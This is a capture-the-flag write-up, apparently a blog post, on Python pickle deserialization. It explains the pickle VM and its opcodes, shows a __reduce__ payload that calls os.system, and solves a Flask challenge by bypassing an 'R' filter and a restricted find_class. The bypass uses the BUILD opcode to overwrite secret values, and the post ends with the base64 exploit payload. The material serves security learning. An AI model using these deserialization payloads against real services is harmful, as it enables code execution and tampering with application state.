Pickle Deserialization: 高校抗“疫”网络安全分享赛 (University Anti-Epidemic Cybersecurity Sharing Competition)

What is Pickle?

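Introduction

A few days ago I read p牛's article on pickle deserialization, and a CTF happened to feature the topic right afterwards, which gave me a chance to deepen my understanding through practice. First, though, I need to know what pickle deserialization actually is.

The pickle format is effectively a stack-based language that runs on a lightweight PVM (Pickle Virtual Machine). The PVM has three main parts: an instruction processor, a stack, and a memo.

  • Instruction processor: reads opcodes and their arguments from the stream and interprets them. The value left on top of the stack at the end is returned as the deserialized object.
  • stack: temporary storage for data, arguments, and objects; implemented as a Python list. Think of it as the computer's RAM.
  • memo: storage that persists for the whole lifetime of the PVM; implemented as a Python dict. Think of it as the computer's disk.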
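To make the roles of the stack and the memo concrete, here is a minimal sketch using a hand-written protocol 0 pickle. The byte string is made up for illustration and is not part of the challenge.

```python
import pickle

# I1\n  -> push the integer 1 onto the stack
# p0\n  -> PUT: copy the stack top into memo slot 0
# 0     -> POP: discard the stack top (the stack is now empty)
# g0\n  -> GET: push the value stored in memo slot 0 back onto the stack
# .     -> STOP: return whatever is on top of the stack
data = b"I1\np0\n0g0\n."

result = pickle.loads(data)
print(result)
```

The value survives the POP only because it was saved in the memo first, which is the sense in which the memo outlives individual stack operations.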

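Instruction set

At the time of writing there are 5 protocols in use for pickle (Python 3.8 later added protocol 5). The higher the protocol version, the newer the Python version needed to read the resulting pickle.

  • Protocol v0 is the original "human-readable" protocol and is backwards compatible with earlier versions of Python.
  • Protocol v1 is an old binary format that is also compatible with earlier versions of Python.
  • Protocol v2 was introduced in Python 2.3. It provides a much more efficient mechanism for pickling new-style classes. See PEP 307 for the improvements brought by protocol 2.
  • Protocol v3 was added in Python 3.0. It has explicit support for bytes objects and cannot be unpickled by Python 2.x. It is the default protocol in Python 3.0 through 3.7 (Python 3.8 changed the default to protocol 4) and the recommended one when compatibility with other Python 3 versions is required.
  • Protocol v4 was added in Python 3.4. It adds support for very large objects, pickling more kinds of objects, and some data format optimizations. See PEP 3154 for the improvements brought by protocol 4.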
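As a quick way to see the protocols side by side, the following sketch pickles one sample object (an arbitrary dict chosen for illustration) under protocols 0 through 4 and prints the first few bytes of each result.

```python
import pickle

obj = {"name": "giao", "tags": [1, 2, 3]}

# Serialize the same object under protocols 0 through 4.
dumps_by_proto = {p: pickle.dumps(obj, protocol=p) for p in range(5)}

for proto, data in dumps_by_proto.items():
    # Protocol 2 and later start with the PROTO opcode (0x80) followed by
    # a byte holding the protocol version.
    has_header = data[:1] == b"\x80"
    print(proto, len(data), has_header, data[:12])

# Every protocol round-trips to an equal object.
assert all(pickle.loads(d) == obj for d in dumps_by_proto.values())
```

Protocols 0 and 1 have no version header, which is why a hand-written protocol 0 payload can simply start with an opcode.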

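All of the opcodes can be looked up in the pickle source code. They are reproduced below (the listing is long, so feel free to skip it).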

# Pickle opcodes.  See pickletools.py for extensive docs.  The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from < 256 bytes
LONG4          = b'\x8b'  # push really big long

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " < 256 bytes

# Protocol 4
SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length < 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame
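Rather than scanning the listing by eye, the same table can be queried from the standard library. This is a small sketch using pickletools.opcodes; the four opcodes looked up are simply the ones that matter later in this write-up.

```python
import pickletools

# pickletools.opcodes is a list of OpcodeInfo records: .code is the
# one-character opcode, .name its symbolic name, and .proto the first
# protocol version that defines it.
by_code = {op.code: op for op in pickletools.opcodes}

for ch in ("c", "R", "b", "\x81"):
    info = by_code[ch]
    print(repr(ch), info.name, "protocol", info.proto)
```

Note that BUILD is reported as a protocol 0 opcode, so it can be used in a hand-written text pickle.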

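Pickle serialization

Pickle payloads are produced mainly in two ways: through the __reduce__ magic method, or by writing the opcodes by hand.

  • The __reduce__ method

    import os
    import pickle

    class exp(object):
        def __reduce__(self):
            # pickle calls os.system(s) when this object is loaded
            s = r"""touch /tmp/success"""
            return (os.system, (s,))

    print(pickle.dumps(exp(), protocol=0))
    # output on Windows, where os.system lives in the nt module (posix on Linux)
    >>>b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'

  • Hand-written opcodes, which can be debugged and analyzed with pickletools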

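    $python -m pickletools pickle.txt
        0: c    GLOBAL     'nt system' # push the callable nt.system (posix.system on Linux) onto the stack
       11: p    PUT        0  # store that object in memo slot 0
       14: (    MARK   # push a marker for the start of a tuple
       15: V        UNICODE    'touch /tmp/success'  # push a string
       35: p        PUT        1   # store the string in memo slot 1
       38: t        TUPLE      (MARK at 14) # pop everything pushed since the MARK and push a tuple built from those items
       39: p    PUT        2  # store the tuple in memo slot 2
       42: R    REDUCE  # pop two items (the callable and the argument tuple), call the callable, and push the result
       43: p    PUT        3 # store the stack top (the result of the call) in memo slot 3
       46: .    STOP # end
    highest protocol among opcodes = 0 # protocol v0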
    
    >>>b'''cnt
    system
    p0
    (Vtouch /tmp/success
    p1
    tp2
    Rp3
    .'''
    

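    Note: rules for writing PVM instructions
    (1) Every opcode is a single byte.
    (2) An instruction that takes an argument ends it with a newline. (This applies to the text opcodes of protocol 0; binary opcodes use fixed-size or length-prefixed arguments.)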
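Both approaches can be tried safely by swapping the shell command for a harmless call. The sketch below is an illustration only: the Demo class and the use of len are stand-ins chosen here, not part of the original exploit.

```python
import pickle
import pickletools


class Demo:
    """Harmless stand-in for the exp class: __reduce__ returns (callable, args)."""

    def __reduce__(self):
        # On load, pickle calls len("abc") and returns that result
        # instead of a Demo instance.
        return (len, ("abc",))


# Approach 1: let pickle generate the opcodes from __reduce__.
generated = pickle.dumps(Demo(), protocol=0)

# Approach 2: write the opcodes by hand. Each opcode is one byte, and in
# protocol 0 each textual argument ends with a newline.
handwritten = (
    b"cbuiltins\nlen\n"  # GLOBAL: push builtins.len
    b"("                 # MARK
    b"Vabc\n"            # UNICODE: push 'abc'
    b"t"                 # TUPLE: pop back to the MARK, push ('abc',)
    b"R"                 # REDUCE: call len('abc'), push the result
    b"."                 # STOP
)

# genops disassembles the stream without executing anything.
names = [op.name for op, arg, pos in pickletools.genops(handwritten)]
print(names)

print(pickle.loads(generated), pickle.loads(handwritten))
```

Disassembling with genops (or python -m pickletools) before loading is a reasonable habit when experimenting, since loading is what actually runs the callable.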

Challenge analysis

The challenge is called webtmp. Its source code follows.

import base64
import io
import sys
import pickle

from flask import Flask, Response, render_template, request
import secret

app = Flask(__name__)

class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

def read(filename, encoding='utf-8'):
    with open(filename, 'r', encoding=encoding) as fin:
        return fin.read()

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.args.get('source'):
        return Response(read(__file__), mimetype='text/plain')

    if request.method == 'POST':
        try:
            pickle_data = request.form.get('data')
            if b'R' in base64.b64decode(pickle_data):
                return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
            else:
                result = restricted_loads(base64.b64decode(pickle_data))
                if type(result) is not Animal:
                    return 'Are you sure that is an animal???'
            correct = (result == Animal(secret.name, secret.category))
            return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
        except Exception as e:
            print(repr(e))
            return "Something wrong"

    sample_obj = Animal('giaogiao', 'Giao')
    pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
    return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
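One detail of the source worth testing is the b'R' check: it looks at every byte of the decoded stream, not only at opcodes. The sketch below (helper names are made up for illustration) compares that byte-level check with an opcode-level check built on pickletools.genops.

```python
import pickle
import pickletools


def naive_filter_hits(data: bytes) -> bool:
    """Mirror of the challenge's check: any 0x52 byte anywhere in the stream."""
    return b"R" in data


def uses_reduce(data: bytes) -> bool:
    """Opcode-level check: is REDUCE actually one of the opcodes?"""
    return any(op.name == "REDUCE" for op, arg, pos in pickletools.genops(data))


# A harmless pickle whose only 'R' is inside a string.
harmless = pickle.dumps(("Rabbit",), protocol=0)
print(naive_filter_hits(harmless), uses_reduce(harmless))
```

For the attacker this means the payload must avoid the byte 0x52 everywhere, including inside string arguments, not just avoid the REDUCE opcode.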

Two key points stand out:

  • The input is unpickled, but find_class only allows globals to be looked up in sys.modules['__main__']
  • When correct is True, the flag is returned
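The effect of the find_class override can be checked locally. This sketch copies RestrictedUnpickler from the challenge source and feeds it a harmless probe (a hand-written pickle that only references builtins.len, chosen here for illustration).

```python
import io
import pickle
import sys


class RestrictedUnpickler(pickle.Unpickler):
    # Same logic as the challenge source.
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


# GLOBAL builtins.len followed by STOP: harmless, but outside __main__.
probe = b"cbuiltins\nlen\n."

try:
    restricted_loads(probe)
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    print(exc)

# The stock unpickler resolves the same global without complaint.
print(blocked, pickle.loads(probe) is len)
```

So the usual os.system payload fails twice: it contains the R opcode, and its GLOBAL lookup is rejected before anything can be called.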

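Going by that condition, we need to unpickle an Animal object whose attributes equal the name and category in secret. That passes the check and yields the flag.

secret.py is not provided, but it is not hard to guess roughly what it looks like.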

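# secret.py (a guess at its contents)
name = "xxx"
category = "?????"

# Quick test, run from the main module (assumes `import sys` and `import secret` there)
a = sys.modules['__main__'].secret.name
print(a)  # xxx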

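That leaves a couple of approaches:

  • Read the name and category values from secret, then use them to create the Animal object
  • Overwrite name and category, then create the Animal object from the values we wrote

The first approach did not work: after many attempts, I could not find a way to reach __main__.secret.name.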
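One likely obstacle, inferred here from the challenge's find_class rather than stated in the original post, is that find_class does a single getattr on the __main__ module, and getattr does not follow dots. The sketch uses made-up stand-in modules to show the difference.

```python
import types

# Hypothetical stand-ins for the real modules, for illustration only.
fake_secret = types.ModuleType("secret")
fake_secret.name = "xxx"
fake_main = types.ModuleType("__main__")
fake_main.secret = fake_secret

# find_class('__main__', 'secret') boils down to this, and it works:
module_obj = getattr(fake_main, "secret")

# find_class('__main__', 'secret.name') boils down to this, and it fails,
# because getattr treats 'secret.name' as one single attribute name.
try:
    getattr(fake_main, "secret.name")
    dotted_ok = True
except AttributeError:
    dotted_ok = False

print(module_obj is fake_secret, dotted_ok)
```

The GLOBAL opcode can therefore hand us the secret module object itself, but not its attributes directly, which is what makes the overwrite approach attractive.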

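So consider the second approach. While reading through the documentation for the various pickle protocols, I found in the protocol 2 documentation that

an object's attribute values can be changed during deserialization. The corresponding opcode is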

BUILD          = b'b'   # call __setstate__ or __dict__.update()

Now the plan is clear: first overwrite the attribute values, then create the Animal object. Time to write the pickle opcodes by hand.
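Before targeting the server, the overwrite step can be rehearsed locally. The sketch below is an assumption-laden stand-in: demo_main and its secret attribute are fake modules created on the spot, and the stock pickle.loads is used so that only the BUILD behaviour is being tested.

```python
import pickle
import sys
import types

# Hypothetical stand-in modules; 'demo_main' plays the role of __main__.
demo_secret = types.ModuleType("secret")
demo_secret.name = "real-name"
demo_secret.category = "real-category"
demo_main = types.ModuleType("demo_main")
demo_main.secret = demo_secret
sys.modules["demo_main"] = demo_main

payload = (
    b"cdemo_main\nsecret\n"      # GLOBAL: push the secret module object
    b"}"                         # EMPTY_DICT
    b"S'name'\nS'xxxxx'\ns"      # SETITEM: {'name': 'xxxxx'}
    b"S'category'\nS'yyyyy'\ns"  # SETITEM: add 'category': 'yyyyy'
    b"b"                         # BUILD: no __setstate__, so update module.__dict__
    b"."                         # STOP
)

try:
    returned = pickle.loads(payload)
finally:
    # Remove the stand-in so the demo leaves sys.modules as it found it.
    del sys.modules["demo_main"]

print(returned is demo_secret, demo_secret.name, demo_secret.category)
```

Because a module object has no __setstate__, BUILD falls back to updating its __dict__, and no REDUCE opcode is needed at any point.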

Building the payload

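import base64
import pickle

# Assumes the Animal class from the challenge source is defined in this script.
# Part 1 of the payload: pass in a dict to overwrite the attribute values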
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''
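# Part 2 of the payload: build the object
exp = Animal("xxxxx","yyyyy")
# protocol=3 is pinned so the bytes below are reproducible on Python 3.8+, where the default protocol is 4
payload_2 = pickle.dumps(exp, protocol=3)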
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
# Merge the payloads: drop the trailing '.' (STOP) of part 1 and the leading \x80\x03 (PROTO) header of part 2
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''

print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==
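The whole chain can be rehearsed offline before sending anything. This is a sketch under stated assumptions: FAKE_MAIN replaces sys.modules['__main__'] so the code behaves the same wherever it runs, the secret values are invented, and Animal is trimmed to the parts the check uses. The payload bytes are the merged payload from above.

```python
import io
import pickle
import types


class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __eq__(self, other):
        return (type(other) is Animal and self.name == other.name
                and self.category == other.category)


# Hypothetical stand-ins for the server's __main__ and secret modules.
fake_secret = types.ModuleType("secret")
fake_secret.name = "unknown-name"
fake_secret.category = "unknown-category"
FAKE_MAIN = types.ModuleType("__main__")
FAKE_MAIN.Animal = Animal
FAKE_MAIN.secret = fake_secret


class RestrictedUnpickler(pickle.Unpickler):
    # Same rule as the challenge, but resolving names in FAKE_MAIN.
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(FAKE_MAIN, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


payload = (
    b"c__main__\nsecret\n}S'name'\nS'xxxxx'\nsS'category'\nS'yyyyy'\nsb"
    b"c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03"
    b"X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05"
    b"X\x05\x00\x00\x00yyyyyq\x06ub."
)

# Replay the server's three checks in order.
passes_filter = b'R' not in payload
result = RestrictedUnpickler(io.BytesIO(payload)).load()
correct = (result == Animal(fake_secret.name, fake_secret.category))
print(passes_filter, type(result) is Animal, correct)
```

The comparison succeeds because the first half of the payload has already rewritten the secret values by the time the server builds its reference Animal.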

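Get the flag

Submit the base64 string above as the data form field in a POST request to the challenge page.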


posted @ DEADF1SH_CAT